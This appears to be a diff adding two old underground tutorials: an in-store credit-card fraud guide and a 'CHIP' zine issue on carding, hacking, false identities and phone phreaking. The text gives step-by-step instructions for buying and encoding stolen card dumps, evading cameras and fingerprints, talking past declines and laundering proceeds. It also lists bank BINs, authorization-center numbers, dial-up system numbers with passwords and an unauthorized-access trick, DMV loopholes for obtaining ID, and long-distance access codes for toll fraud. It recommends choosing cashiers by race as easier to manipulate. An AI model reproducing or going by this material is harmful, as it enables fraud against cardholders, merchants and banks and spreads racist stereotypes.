+novelties and give you a higher chance of walking out with your merchandise.
+
+Dumps - The most important item of this whole operation. What would you do without dumps? Nothing
+thats what. I highly recommend snifferhack or linx101 for dumps. They supply the best quality on dumps.
+I have over 7-12 different dump vendor friends and I still stay strong with these 2. Now depending on
+what youre planning on getting out for your first op will determine on how much you will need to spend
+on dumps. I would not worry about spending for now. As soon as your op is over you will see that you
+have well made your money back from this.
+Wallet - Some people may think that putting the plastic and novelty in your own wallet is not a bad idea.
+But the truth is that it is probably one of the biggest problems that could arise if anything was to happen.
+Keeping your false information and your real information seperate is a necessity. If you have any sort of
+personal contact information on you when carding I would suggest dropping it off in your car.
+Optional Items -
+Fake ID - HIGHLY RECOMMENDED but is not always needed. Most of the time for large purchases
+cashiers will ask for an identification that matches the plastic. There are numerous vendors out there who
+provide a novelty service that will fit your needs. Getting a state that is semi close to you is ideal in this
+situation.
+Anonymous Phone - This is optional to have, I have used Chrome's dumps the most and he checks the
+dumps before sending so that all are valid. His dumps work 8/10 times on average. So if one card does
+not work I simply hand them another card with an excuse as to why that card was not working. When
+using a phone merchant there are two ways of authorizing a card. Some people think that charging a $1 or
+$1.50 on the card will not kill the card as many businesses use a $1 or $1.50 charge as a pre-authorization
+to check and see if the card is valid. Others prefer charging a random higher amount to make it look like a
+legit purchase. Either way, its up to you how would want to check it.
+Serial to USB Converter - Smaller laptops may not come with a serial port to connect your encoder to. If
+this is the case you will need to buy one of these.
+Price: $15-$25
+Newskin Bandaid Liquid - You might be asking yourself "What would I do with this?". Well, if you
+really want to be protective you can put some newskin on your finger tips so no traces of fingerprints will
+appear on the plastic if any misfortune was to happen.
+Planning:
+Planning out what youre going to buy before you buy it would be a nice thing to do. It saves you time
+thinking of what you need or might need.
+Also think about this. If youre main goal is to get a hefty sum of money, you should checkout ebay to see
+what sells for a high percentage. Usually gift cards to popular stores get high amounts back because they
+are just like cash. But just double check ebay.
+If youre going to do an instore op for your own personal pleasure then you really dont need to make a list
+because you should already know what you want to get. Or you can look around in the store and choose
+what you want.
+Taking care of business:
+Before hand I always like going to the bathroom. It makes the carding situation a bit more easier if you
+get nervous. You do not want to get caught and be remembered as the kid who shit his pants. That is if
+you do get caught which odds are you wont if you follow these instructions.
+
+Destination Safety:
+Choosing a location to instore is not very hard. The internet has a vast amount of websites that have store
+locators. So find your subject mall or store and do a search to see whats around you. Here is a very
+important rule to follow by. Do not do anything where you live. Or in a more common way of putting it.
+Dont shit where you live. Find a store thats atleast a good half hour drive away from you and is atleast
+two cities over.
+Some people choose to use fake license plates when entering your destination for carding just to add that
+extra level of security on in case a camera catches the car that drives away. This is ofcourse optional, but
+it doesnt hurt to put more safety on. Just dont speed away or anything that could get you pulled over.
+Parking - When parking your car, make sure you park for out so no camera will catch your license plate.
+It will be worth the extra walk when youre walking out with your merchandise.
+So now you have everything you need to get started. Youre prepared for the best and the worst situations
+to come.
+The first time you go out you should expect some nervousness to come even before entering one of the
+stores listed below. The most important thing to do is to stay calm and act natural. The more suspicious
+you act, the more the cashier is going to suspect something is up. I do not recommend taking any drug or
+alcohol to calm yourself down. You need to look calm and natural while being alert to your atmosphere at
+the same time.
+Anatomy of a dump:
+B41111111111111111111^LASTNAME/FIRSTNAME^060910100 000000000000000000
+41111111111111111111=0609101000000000000000000000
+B - Identifies to the POS system that your card is a bank card
+4111111111111111 - Credit Card Number
+Lastname - Lastname of cardholder
+/ - Seperater
+Firstname - Firstname of cardholder
+06 - Experation Year
+09 - Experation Month
+101 & Beyond - Bank data
+Now some vendors will only sell the second track. So that leaves you with trying to figure out how to
+write track1. Most stores do not check track1 so it is not the most important thing. But to be safe I always
+include track1. Here is an example of what you will need to do. It is very easy.
+4111111111111111=060910100000000000000
+If you havent noticed, track2 in most cases is just like track1. To begin making track1, add a B that will
+indeicate its a Bank card.
+B4111111111111111=060910100000000000000
+
+Then, youre going to want to change the = to a
+^lastname/firstname^ .
+B4111111111111111^LASTNAME/FIRSTNAME^0609101000000 00000000
+And finally, youre going to add six zeros at the end of the dump.
+B4111111111111111^LASTNAME/FIRSTNAME^0609101000000 00000000000000
+And thats your dump. Like I said its not hard to create track1 from only having track2. If you soley buy
+from BadB (soon ccoming back Smile) and linx,Script,Ryden or sniffer you will not have to do this.
+Software to encode the dumps - I recommend TheJerms software. It is very self explanatory.
+Types of dumps:
+People ask me all the time about using generated dumps and if theyre good. I would not use generated
+dumps. Most of the time they will only work correctly with a certain Bin. And there is a 15% less success
+rate than using other types of dumps. You might as well use quality dumps in your locations you choose
+so people will not remember you instead of having errors come up and your face gets noticed more easily.
+The best quality dump you will probably find are skimmed dumps. Skimmed dumps mean that the actual
+card was swiped onto a portable Mag Stripe reader. Therefore, using these you know you will have all of
+the correct information for track1 and track2.
+Hacked dumps are usually taken from databases by you guessed it, hackers. The quality on these are the
+normal quality thats out there.
+Dump types and limits:
+I will only discuss so far visa, discover dump limits and a word on amex dumps as I have not encounted
+any use with mastercard dumps.
+Visa Classic - These types of dumps are usually the cheapest to buy from a vendor. I have heard that on
+average you can get $500 on these types of dumps. But I have been pulled atleast $800 on them. Visa
+classics have a balance limit of $500 to $3,500. Although the most I have been able to get off of a single
+classic is $2,600 before an error occurs.
+Visa Gold - One step above the classic, These limits start at $3,500 and can double as the cardholder
+gains good credit. With these you can make higher amounts of purchases.
+Visa Platinum - Visa platinum dumps are for the larger purchases mainly. On a good day you can pull off
+anywhere from $3,000 to $6,000 .
+Visa Signature & Business - Signatues are said to have no limits. So for us that means these have the
+highest limits available. People have said to have gotten anywhere from $5,000 to $20,000 off of these
+types of dumps.
+Discover - I have not used these that much in my past but from what I gathered you can get anywhere
+from $1,000 to $5,000 on these in one purchase. Using these dumps for multiple purchases will most
+likely kill the dump before you get past either of those limits. Almost all discover cards begin with a
+balance of $10,000.
+Amex - I have not used these dumps. The reason to that is that you need the correct CVN to complete the
+transaction. It is not embossed, but printed onto the plastic. So you cannot re encode amex dumps. If the
+
+CVN is not correct when entered, you will automatically get a call for authorization.
+How long dumps last:
+This question no one can answer. You might be able to make a good prediction of how long they will last
+if you think of time and the dump type. For instance. If you have a classic dump, its 11:30 AM and you
+make a variety of small (Under $20) purchases. Odds are youre going to get that card to last a lot longer
+than a classic dump thats doing $300 purchases at 7:30 PM. Think of the cardholders work hours. They
+will usually be 9 AM to 5 PM. That is when their card is idle so to speak.
+Choosing your cashier:
+This is probably one of the more fun things to do while instoring. Usually 90% of the time, Minorities
+and Younger Girls make the best choice for cashing out. Minorities include, Blacks, Mexicans, and
+Asians if you were wonderings. The reason you want to choose these types for your cashiers are because
+they are usually the easiest to manipulate. In some cases you are going to have to use a normal person to
+cashout. But try not to make it a habit.
+Interactions with the cashier:
+In order to safely get your items out of the store successfully, you will need to know how to interact with
+the cashier. To in a sense manipulate them. When you bring your stuff up to the cashier act normal. If it is
+a large amount they might say something nice to you mentioning the amount of merchandise you are
+buying. Just play with it and make them feel good aswell. If you make the cashier not feel comfortable
+they will think something is up if any error happens. Which will sometimes if you are planning on doing a
+lot of instore.
+Errors and Excuses:
+As I was saying above, there are going to be errors now and then. Now most are very easy to talk your
+way out of. But in some cases youre going to need to know when you try and grab your novelty and card
+and just run. That will most likely not happen if youre only doing this a few times but for people who are
+planning to do this more often it is most likely going to happen atleast once. I have listed below a few
+common errors and how to handle them.
+Optional Pre-Excuse - LWAI brought this excuse method to a lot of peoples attention and it is a very
+good idea in most cases. Making the cashier already think that the transaction will not go through so they
+are not surprised by the error, which makes handling the situation much easier. Saying something as easy
+as *I hope I have enough to cover this* or anything around those terms is good.
+Declined - Once you spend and spend on a good dump there has to be an ending point. Usually with
+dumps that will not die this is the final step to completing it. Hopefully you will have another card on you
+to hand the cashier. If you don't thats fine too.
+If you have another card - Oh, I thought that was going to happen. Here try my other card. If you do not
+have another card - I will be right back. I'm going to go get my check book / go to the ATM.
+Call For Authorization - This one can be tricky if you do not have the right cashier. This is something you
+DO NOT want the cashier to do. A call for authorization is basically the store calling the bank or the
+stores authorization center in order to confirm that it is the actual cardholder making the purchase. If this
+happens just stay calm.
+If you have another card - I don't have that much time, Ill call the bank later. Try my other card. If you do
+not have another card - I don't have that much time for this Ill call my bank and come back tomorrow.
+
+If they persist on making the call, put your hand out as if they were going to give you your plastic back.
+Doing this tends to put some stress on the cashier as to whether or not give the card back to you. They
+usually will put the card back in your hands.
+Do Not Honor - This will happen every now and then and is probably the easiest to overcome. The
+cashiers will sometimes just ask you if you have another card.
+If you have another card - Hand them the card and say you'll call the bank about that one. If you do not
+have another card - Oh, I will call my bank about that tomorrow (then leave)
+Those are the most common problems you are going to find. Of course there are more error codes. There
+are about 50 of them. But by the time you manage to talk yourself out of these you will have enough
+experience to talk yourself out of the rest.
+Selling your items:
+There are a vast amount of ways for you to liquidate your items. The best way to do so is on ebay. I am
+not going to go into a large description because then this tutorial would change to how to sell your items
+or scam on ebay. You can either buy an account from a vendor or get a B&M bank account and create
+your own. I do not suggest using your own ebay account. A lot of people have in the past and even if a
+good amount havent been caught, you do not want to be that small percent that does.
+Here is another area that can be done in a lot of ways. I will tell you to not put the money in your legit
+bank account. If you were thinking that, you should take a minute and think again. You could store your
+money on an electronic bank account service such as egold, or webmoney. Or if you want
+more control over your money, you could keep it all in a well hidden safe. Using an electronic bank
+account instead has a higher security rate. As if anything was to happen to you involving LE, odds are
+they will not find your information for that account. Which means they would not have access to your
+funds because they would not know it exists.
+End Notes:
+Thank you for taking your time to read this tutorial. I hope it was worth your time! I also hope that
+everyone who is inspired by this reply with any words or questions they would like to say. Good luck to
+all of you!
+Merchant Codes:
+Quote:00 Approved
+01 Refer to Card Issuer
+02 Refer to Card Issuer, special condition
+03 Invalid Merchant
+04 Pick up card
+05 Do not honor
+06 Error
+07 Pick up card, special condition
+08 Honor with identification
+09 Request in progress
+10 Approval for partial amount
+11 Approved VIP
+12 Invalid Transaction
+13 Invalid Amount
+14 Invalid card number
+19 Re-enter transaction
+21 No action taken
+
+30 Format Error
+41 Lost card Pick up
+43 Stolen card Pick up
+51 Not sufficient funds
+52 No checking account
+53 No savings account
+54 Expired card
+55 Pin incorrect
+57 Transaction not allowed for cardholder
+58 Transaction not allowed for merchant
+61 Exceeds withdrawal amount limit
+62 Restricted card
+63 Security violation
+65 Activity count limit exceeded
+75 Pin tries exceeded
+76 Unable to locate previous
+77 Inconsistent with original
+78 No account
+80 Invalid transaction date
+81 Cryptographic PIN error
+84 Pre-authorization time to great
+86 Cannot verify PIN
+89 MAC error
+91 Issuer unavailable
+92 Invalid receiving institution id
+93 Transaction violates law
+94 Duplicate transaction
+96 System malfunction
+Dumps Tutorial :#2
+INTRODUCTION:
+C=The *use* of our credit system for personal gain & financial freedom!
+H=The practice of accessing *secure* computers with innovative techniques/skill.
+I=Assuming or establishing a *new* guise by "creating" an identity on paper.
+P=The know-how and interest in the telecom industry and the services it provides
+Hi-?!
+Issue two already! I just finised #-01 about a week ago, and already I feel
+I have enough text & information of interest to warrant a quick follow-up to
+#-01! ....so here it is, #-02! I hope #-01 has provided those who have read it,
+something to think about and/or "work on". If not, well then perhaps this one
+will. If not, then perhaps a monastery or convent would be a better place for
+the likes of you!!
+II.> PART 2-
+\|/
+?[>*C*H*I*P*=>!
+
+*C* - CARDING> /|\
+Intro:
+Below are as many BIN's as I could round up. Each one is listed according to
+the Banks ID No. (BIN) - which are the first 6 nos. of a CC. (Credit Card).
+Of course, the first no. indicates a Visa (4) or a Mastercard (5). Bin's aren't
+all that important to know, but can be if you NEED to know the name of a bank
+that issued the CC no. you have.
+So FYI and bemusement, here's that information-
+BANK IDENTIFICATION NUMBERS:
+^^^^ ^^^^^^^^^^^^^^ ^^^^^^^
+~~VISA BINs~~
+^^^^ ^^^^
+*4000-4999*
+401903 = Bank of America
+402400 = Bank of America
+402402 = Bank of America (Gold)
+403200 = Household Bank
+4040?? = Connecticut National Bk
+4040?? = Wells Fargo
+4050xx = 1st Interstate
+4052?? = First Cincinnati Bank
+405209 = First Nationwide Bank
+4060?? = Navy Federal Credit Union
+407000 = Security Pacific Ntl. Bank
+407129 = Colonial National Bank
+411427 = Chemical Bank
+412174 = Signet Bank/Virginia
+412185 = Citibank/Signet?
+41235? = Commerce Bank
+4128xx = Citibank
+416818 = Great Western Bank
+4131?? = State Street Bank
+4170?? = Beneficial National
+417129 = Colonial Bank
+4188?? = Ohio Savings & Loan
+4211?? = Chemical Bank
+4215?? = Marine Midland
+422591 = Chase Manhattan
+4226xx = Chase Manhattan
+4231?? = Chase Lincoln 1st Classic
+4232?? = Chase Lincoln 1st Classic
+4237?? = Cicero Credit
+4241?? = Natl. Westminester Bank
+425043 = First Chicago Bank
+425330 = Bank of N.Y./Consumer Edge
+425451 = Chemical Bank
+4262xx = Corestates Bank of DE
+427138 = Citibank
+
+4302?? = HouseHold Bank
+431068 = Bank-Layfayette/Imprl Svg's
+4312?? = Barnette Credit
+431301 = Valley Federal S&L
+431663 = Glendale Savings & Loan
+431772 = Gold Dome
+4321?? = Mellon Bank
+433213 = Bank of Indiana
+433222 = Far West Virginia
+4349?? = First Bank of America
+436800 = Sovran Bank/VA
+438733 = Bank One
+438760 = More Bank
+440121 = Gary Wheaton
+440862 = Charleston of Indiana
+441712 = Mellon Bank
+442813 = Bank of Hoven
+442843 = " " " "
+44288? = Colonial National Bank
+443600 = Security Bank of Monroe
+4448?? = First National Bank - RI
+46165x = First Interstate Bank
+4626?? = Indiana National Bank
+4646?? = Mercantile
+4672?? = Mercantile Bank
+467362 = First National Bank;
+467807 = Home Fed Svg's/1st Card
+467808 = Home Fed Svg's/1st Card
+468120 = Harris Trust Savings
+4696?? = Credit of Kansas
+4718?? = Colorado Bank
+4734?? = Madison Bank
+480012 = Valley Federal S&L
+4811?? = Bank of Hawaii
+4825?? = First Wisconsin
+4897?? = Village Bank of Cinn., OH _________
+/ Here are \
+4929?? = Barclay Bank/DE | what the |
+^ | holograms |
+| | SHOULD show!|
+| \_____ _____/
+*BIN* = #### ## (1st 6 nos.) Y
+| |
+| _____________________________|______
+| [ | ]
+^ | MASTERCARD INTERNATIONAL___v____ |
+| | [ v+===\*] |
+/--<+-->| 5555 1234 5678 9012 [ | I|] |
+| | ^^^^ ^^ ] Q I|] |
+| +==>| 6512 11-91 TO 11-92 [ /|\ I|] |
+| | | ^^^^ [_/^\_ I=] |
+| | | JUSTIN CASE MD [________] |
+
+| | | |
+| | [____________________________________]
+| |
+| *-==>IBN* = #### (above cardholder's name)
+| |
+| |
+A>|M/C's |
+==v===== v
+1st- X IBN.
+###### X #### Bank/Institution Name
+^^^^^^ ^ ^^^^ ^^^^ ^^^^^^^^^^^ ^^^^
+5000-5399
+=========
+5031?? = #? -Maryland Bank MBNA
+5127?? = 1015 -?
+520400 = 1006 -Security Pac Ntl Bk
+521142 = 6142?-Chemical Bank
+521531 = 6207 -Marine Midland
+521795 = 1033?-Manufacturers Trust
+5218?? = #? -Citibank N.A.
+523080 = #? -Harris Trust Svgs
+5233?? = 1226 -Huntington Bank
+524200 = 6066 -Chevy Chase F.S.B.
+5250?? = 1260 -?
+525400 = #? -Bank of America-ca
+525402 = #? -Bank of America-pa
+5263?? = 1263 -Chemical Bank
+5272?? = #? -Connecticut Ntl
+5273?? =p #? -Bank of America
+527706 = #? -FIB
+52820? = #? -Wells Fargo
+5286?? = #? -Chase Lincoln 1st
+5286?? = 1286 -Home Fed Savings
+528707 = #? -Valley National Bank
+529107 = 1001 -Signet Bank/VA
+529801 = #? -Bank One
+5317?? = #? -Norwest Financial
+5323?? = #? -Bank of New York
+532903 = 6017 -Maryland Bank; MBNA
+532956 = 6017 -Maryland Bank; MBNA
+539655 = 7462 -Universal Bank/AT&T
+539855 = 7462 -Universal Bank/AT&T
+5400-5999
+=========
+540126 = 6017 -Valley Federal S&L
+540193 = 8084 -Fidelity Investors Bk
+541037 = 6037 -Wells Fargo NA
+541065 = 6785 -Citibank NA
+541085 = 6785 -Citibank NA
+541116 = #? -1st Financial/Omaha
+541169 = 1169 -1st Financial/Omaha
+5412?? = 6037 -?
+
+5414?? = #? -Ntl. Westminster Bank
+5415?? = #? -Colonial National Bk
+541586 = 1586 -HouseHold Bank
+541711 = 1711 -?
+541919 = #? -FIB
+541933 = 1933 -Bank of Hoven
+541934 = #? -Berthoud Ntl Bk
+542096 = #? -Colonial Bank
+542143 = 2143 -?
+54224x = 1049 -MHT
+542418 = 1065 -Citibank
+5432xx = #? -Bank of New York
+5455?? = #? -PSFS
+5464?? = 1665 -Chase Manhattan
+546598 = " " -Chase Manhattan
+5601?? = 1352 -FIB
+5678?? = 1207 -Marine Midland
+591210 = 6282 -Wells Fargo
+xx= All nos. in series are that bank's.
+??= Unsure of full IBN/BIN no.
+B> - Authorization Centers - ("AC")
+Intro: Authorization Centers are located throughout the country and are in just
+about every financial institution that is involved in the distribution and/or
+issuance of credit cards. Of course, Visa and M/C have some as well.
+Citibank, First Interstate Bank and Bank of America all have their own AC's
+available to their merchants. There are however many other AC's that provide the
+same types of services to their merchants. It is the merchant who is 'really'
+providing the services though. It is the merchants responsibility in most cases
+to determine that a credit card is valid. On top of that they are also even
+offered a whole $50 if they assist in the conviction of anyone suspected of
+using a stolen/forged card. $50!! Hardly worth it, so most don't even try....
+One of the quickest ways a card is checked is by accessing an AC through a
+card reader. Verifone is perhaps the largest mfg. of these devices, which are
+used by most retail stores or restaurants for CC verifications.
+The telephone no. that is called using one of these card readers is the
+first one in which I've listed below. You can also log onto this "carrier" via a
+a modem, but I've yet to figure out what the necessary input is to utilize this
+service on my computer. A touch tone phone suffices however, and the required
+input is listed below for using this particular AC (Authorization Center).
+One other thing to note here is that whenever you are at a store/merchant
+and using a shady (at best) card, be especially alert to the merchant and/or
+cashier when they are getting verification of the transaction. If they use
+the telephone and voice in the request for the authorization, then listen
+for "Code-10", and if you hear them say this at any time- GET THE HECK OUT!!
+If they use a card reader for the transaction and get something like "CALL
+
+CENTER" on the read out, then remain calm and ask what the problem is, and if
+at anytime they are out of sight or on the phone with the center for
+any prolonged amount of time, then again- GET OUT OF THERE!!
+A "code-10" is a merchant's signal to an authorization center that they are
+suspicious of the card user. If you are using an AMEX, then run out of there
+twice as fast, because AMEX calls the police from their authorization center.
+V/MC don't usually call the police, but AMEX will use stall tactics while the
+police are on the way. (One way is to ask to speak with you and then ask you
+some rather lengthy detailed questions, like primary cardholders name, SSN &
+Mother's Maiden). You can always just look out the window and exclaim, "Hey!
+someone's stealing/towing my car!" and then leave pronto!....
+** Use the following telephone nos. before going into ANY store to use a card.
+They are worth the extra minute or so to be sure that the card is still valid!
+1>.
+800/228-1111 = On-Line Auth. Center (300baud)/Touchtone Ok too.
+Merchant No.#Card No.#Exp.Date#Amt# **push the "#" after each entry**
+(Merch No.=A 16 digit-#; 1st no. is 4 or 5 & can often be found on carbons
+just above the merchants name.)
+2>.
+800/228-2211 = This is the voice authorization number of the same group
+who operate the one above. I am fairly sure that these two are operated by
+M/C and Visa, and I do know that the merchant nos. that work on one, also
+work on the other. This AC, is also useful for obtaining a BIN no., and/or
+the issuing bank of a particular credit card. Just ask the verification op.
+for merchant services and she will connect you to their information dept.
+3>.
+800/554-2265 = Bankcard Auth. Ctr.
+For MasterCard: 1067#52#10#CardNo#Exp#$$$$#
+For Visa: 1067#24#20#CardNo#Exp#$$$$#
+4>.
+800/528-2121 = American Express Auth. Ctr. (Amex only)
+Live ops! - Give: (**Merch#+card#+expdate+amt) **=5041035528
+Merch. No. is for: Popolos Ristorante; 8115 Melrose LA,Ca. 90069
+5>.
+800/327-3584 Authorization Center for Visa & M/C
+***** Merchant No. format is: 101 ### ###; #= unknown no.
+6>.
+800/645-9120 Merchant Service Center for Citibank; NA
+****** Merchant No. format is: ### ### ### ### (the one I had is no longer
+[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
+Glossary of terms used in the preceding text file.
+- Authorization Center = Voice and/or Data terminal which gives merchants
+varying "approval codes" on purchase requests. Some also provide info such as
+BIN No. and Bank Name of a particular card.
+- Bank Identification Number = Issuing bank's identifier. This number is
+
+assigned by the FDIC, I think. The No. can be found on Visa's (unraised)
+just above the CC number. Some larger banks will have several BIN's, because
+they own several smaller financial institutions that issue credit.
+Choice Visa is one example. They are owned by Citibank, but have there own
+seperate BIN. Another example is First Card, which handles Home Fed Savings
+credit accounts.
+- International Bank Number = Bank Identifier on a national level. The
+number is used by various merchants to verify/approve a cardholder when they
+have placed a telephone or mailorder request. It is the 4 digit no. just
+above the persons name, and is only found on M/C's (raised, 'usually' starts
+with a 1,6,7 or Cool & on Amex cards (unraised, usually starting with a 6).
+Though not an absolute, experience has shown that IBN's starting with 6,7 or
+an 8, are usually preferred accounts. IBN's that begin with a 1 or 2 are
+usually found on classic accounts. (see list above)
+- CV = Classic Account; -these two letters can be found on most Visa cards
+that are "Classic Accounts". They usually have a credit limit of some-
+where between $500 to $5000+, though some can go up to $10,000 for long term
+customers.
+- PV = Preferred Acct. or "Gold Card"; -usually limits of 5,000-10,000+. These
+cards are 'usually' found on Gold or 'preferred Visa Cards, and are worth
+their weight in 'gold' as well.... Some can go up to $40,000 or more!!
+++Any additional articles or noteworthy texts to be submitted for inclusion
+in the future issues of *CHIP*, should include a handle &/or method of contact
+for the author. Though not required, this will help in verifying the info &
+assure a timely publish date.
+Our method of contact is simple. Call 800-755-3493, press 9657 before end of
+greeting and give us some idea of what you know or have access to and we will
+consider your request. The only other method we feel safe with is via a typed
+letter sent to: *JC/CA* 15445 Ventura Blvd. #128; Sherman Oaks, CA 91403. We
+need more up to date H/P info since this is not our best subject and since
+there are many others more knowledgable in this field than we are... So let us
+know! ...Otherwise we may change *CHIP* to CIA! & become Anarchist!... then
+again, it's probably too late for that, since we do as we want anywayz..-JC/CA>.
+III.> PART 3:
+\|/
+?[>*C*H*I*P*=>!
+/|\
+*H* - HACKING>
+Intro:
+Hacking Numbers & Carriers! These may also be added to the EXTENDER.DAT
+files of most Hacking/Phreak programs, when reliable carrier no(s) are
+needed.
+* Telephone No= Pwd &/or Locale * Telephone No= Pwd &/or Locale
+------------------------------- ------------------------------
+206-863-0015= ? 800-325-1171= ?
+206-863-3963= ? 800-325-1340= ?
+
+206-863-3700= ? 800-325-1341= ?
+206-863-0426= ? 800-325-1342= ?
+206-863-1150= ? 800-325-1436= ?
+206-863-1183= ? 800-325-1401= ?
+208-772-6134= ? 800-325-1471= ?
+619-723-8996= ? 800-621-3224= ?
+919-323-9888= ? 800-621-3592= ?
+214-263-3109= ? 800-621-3678= ?
+206-825-7206= ? 800-621-3679= ?
+206-825-7598= ? 800-228-1111= ?M/Card-Visa
+206-825-7621= ? 800-334-4000= ?Message system
+206-825-7781= ? 212-370-4303= Cosmos NY
+206-825-6132= Try ctrl-x for prompt 313-855-0203= CosmosMI:ONNERR
+206-825-7905= ? 213-892-7211= Compuserve
+206-825-9000= Montgomery Ward 213-355-5241= Electronic News
+206-833-5329= Wont connect properly 800-555-8677= Ma Bell
+206-825-6234= Oil Company 800-424-9440= Bank
+206-931-4879= Auburn High 213-932-8294= Secret Service
+206-872-4690= Kent High 405-332-9998= Belle Co-puter
+414-476-8010= Milwaukee High 713-241-6421= Shell Oil
+206-771-6551= Tacoma School.P/w=VAXE 713-526-0149= Hospital
+206-825-7720= Compuserve 913-343-1042= Calling card
+312-499-2100= Sears 502-588-6020= Uof Louisville
+617-683-2119= Hospital 502-588-6036= " " "
+800-424-9494= Telenet 213-417-8997= TWA
+800-421-2123= ? 800-828-6321= IBM Computer
+800-558-0001= AGRODATA 206-828-3598= Microsoft
+206-357-7350= Ctrl-data-publishing 800-526-3174= RCA Mainframe
+414-354-0010= T.Y.M.E. Corp. 312-937-1210= ?
+202-553-0229= PENTAGON 206-833-6352= ?
+202-697-0814= PENTAGON 206-833-6364= ?
+304-376-2488= Savings & Loan 202-553-0229= T.A.C
+313-964-2018= Charge card Association N/A-950-1288= AT&T Info Service
+206-833-6133= ? 206-833-6134= ? *P/w For Milwaukee High GNIK, Code:4,71
+800-522-5465= Lab Link **P/w For Ma Bell 948DJU47R
+202-694-0004 User Id= Cohen
+===========================================================================
+====
+ABC East Coast feed 213 935-1111
+Try this # 206-825-2377, hit return a couple of times and you'll get ENTER
+PASSWORD then hit ControL 'U' a few times then hit return. you in
+simple.. Or try mashing keys until it says 'ART GAMBLIN - CHEVROLET'...
+III.> PART 4-
+\|/
+?[>*C*H*I*P*=>!
+/|\
+I - IDENTITIES
+Intro:
+
+DMVRULES.TXT
+What the DMV would rather you DIDN'T know:
+ 10-01-90
+13.301a:
+"...If the applicant is unable to provide a signature within the margin, the
+application should nevertheless be accepted, and there is NO need to prepare
+another application..."
+13.301b:
+..."Usual signature" means the signature the applicant uses when signing
+letters, "checks", etc. It need not correspond exactly to the full name as shown
+at the top of the application or photo document & and in fact, seldom will. If
+the signature includes a nickname not shown in the full name, or if it differs a
+lot from the full name, the employee should indicate "usual signature" in the
+space at the top of application.
+13.301c: ***important***
+If the applicant's, "usual signature" is "printed", it should be ACCEPTED on
+the application.
+13.307: Birth Date Verification
+Any Driver license showing birth date is acceptable in lieu of a birth
+certificate (bc). If the bc is unobtainable, certain other documents may be
+accepted in lieu of the bc. The acceptability of other documents should "NOT BE
+DESCRIBED TO THE APPLICANT" until it is reasonably ascertained that their birth
+record is unobtainable.
+The following ARE accepted forms of identification as listed in the
+DMV Employees Driver License Tech. Manual:
+<<< in order of preference.... their preference, of course! >>>
+1>. Birth Certificate or any "certified Birth Record/Registration".
+2>. Driver License, from CA. or an ID card issued by the State of CA.
+3>. All other state Drivers licenses, Id cards, to include Military too
+4>. Any foreign governments D/L and/or ID. Must have DOB listed on it.
+5>. Passports, Visas, immigration/alien docs or reg. cards. w/ DOB.
+6>. Dept. of Corrections or Youth Authority docs, signed by PA/CS/CAS.
+7>. Driver Education driving permits & training certificates, w/ DOB's.
+8>. Out of State ID cards -NOT necessarily issued by the state's DMV.
+9>. US Census Records. Auth. by 13007.5 VC; ** contact Census Bureau **
+10>. School Cerification (form dl-48); used ONLY when all other forms of Proof
+of ID have been exausted; *contact any local school to get rcrds*. This
+is also an accepted form of ID for SSA (Social Security Administration).
+** Note:
+Tax forms are not accepted with any degree of certainty by the DMV. It's
+always best to use what they see "thousands of time a day", since these docs
+are usually less scrutinized.
+If you have trouble getting the above docs, then just go to Nevada. In NV
+they take almost every Type of ID known in the US. Included in what they will
+accept are W-2 tax forms & 1099 gift-tax forms. Armed with one of these and a
+baptismal certificate you can get a NV ID/DL with no problem, and on the same
+
+day as well. NV is one of the few states that accept Baptismal Certificates.
+.... and Just'in Case you ddidn't know that, Bap. Certs. can be found at most
+at most religious bookstores & supply stores, especially Catholic.
+An added bonus is that they DO NOT fingerprint in NV. You also have the
+option of having your ssn imprinted on the ID card, which is helpful for back-
+up ID. You just tell them your ssn and they'll include it. One bad thing is
+that there is no Exp. date on their ID cards, however there Driver Lic's. do
+have exp. date's and are worth the extra "drive" around the city to get. The
+best days to go are on Tuesdays or Wednesdays.
+***Now here are a few additional points of interest to note for the heck of
+it, so here goes....
+*= THE =*
+**- APPLICATION -**
+II.> Driver Information and the Application.
+Quickly, there are 5 types of forms used by the DMV in processing such re-
+quests as DL, ID, Replacement (of either), Computer paper & the renewal appli-
+cation form (DL-1RN). BTW, according to this doc that I am sorta copying, it
+says that the renewal process will and is being phased out with "the new system
+now being installed". *CA has seen perhaps the very first of this 'new' system.*
+13.011
+Every applicant for an original, or renewal, driver license whose form DL-44
+indicates previous driving experience, but who does not indicate or produce a
+previous license, should be asked whether he/she holds a regular license from
+California or any other state or country. The reason for the inquiry (Sec-12511
+& 12518vc) should be "politely" explained. Instruction or learner's permit &
+"International Drivers Licenses" are not considered to be regular licenses. If
+an applicant over the age of 18 cannot produce a valid or recently (within one
+year) expired foreign license, a check by H-6 inquiry > to the automated sys.
+or Wats Line must be made prior to processing of the application.
++++H-6 inquiry to automated sys OR WATS line sounds like a hacking adventure!..
+Anyone with info on this possibility please fill us in at 800/755-3493 x-9657.
+IV.> PART 5:
+\|/
+?[>*C*H*I*P*=>!
+/|\
+*P* - PHREAKING>
+Intro:
+950XXXX.LST
+Here is a current list of operating L/D Co's, which provide access to
+telco. lines across our fine country (ha!)... Of course what makes it so fine
+is that with each of these L/D carriers, there is a code that is entered to be
+able to access the fine features of each of these fine L/D service providers.
+So someday with nothing better to do, give 'em a try and try out different
+access code numbers (randomly), and hopefully you'll be able to make FREE phone
+
+calls in no time. Don't abuse it however, because they do tend to monitor any
+high usage on these numbers.
+[-------------------------------------------------------------------------]
+| 950- | Code Format | Name of Company | Comments |
+[-------------------------------------------------------------------------]
+| 0223 | 6 digits + acn | Cable and Wireless | Business/calls overseas |
+| 0266 | 7 digits + acn | Com Systems | MC/V/AE w/o exp-ok! Hit "0"|
+| 0370 | 7 digits + acn | LDS | Long Distance Services |
+| 0488 | acn + 13 digits| ITT | |
+| 0511 | 6 digits + acn | Execuline | |
+| 1022 | 0 + acn + 14dig| MCI Execunet | Calling card - 14 digit # |
+| 1033 | 0 + acn + 14dig| MCI | Calling card - 14 digit # |
+| 1044 | 6 digits + acn | Allnet | |
+| 1050 | 6 digits + acn | Metrophone | |
+| 1055 | 6 digits + acn | Telesphere | MC/V/AE ok too!! push "0" |
+| 1407 | 7 digits + acn | TMC Watts #1 in CA | |
+| 1408 | 7 digits + acn | TMC Watts #2 in CA | |
+| 1444 | 9 digits + acn | Allnet | International Access also |
+| 1555 | 6 digits + acn | Telesphere | |
+| 1621 | 9 + acn + 6dig#| na | 9 + acn + 6 digits? |
+| 1772 | code + acn | na | Voice for "access code" |
+| 1820 | na | BizTel | |
+| 1979 | 6 digits + acn | VorTel | |
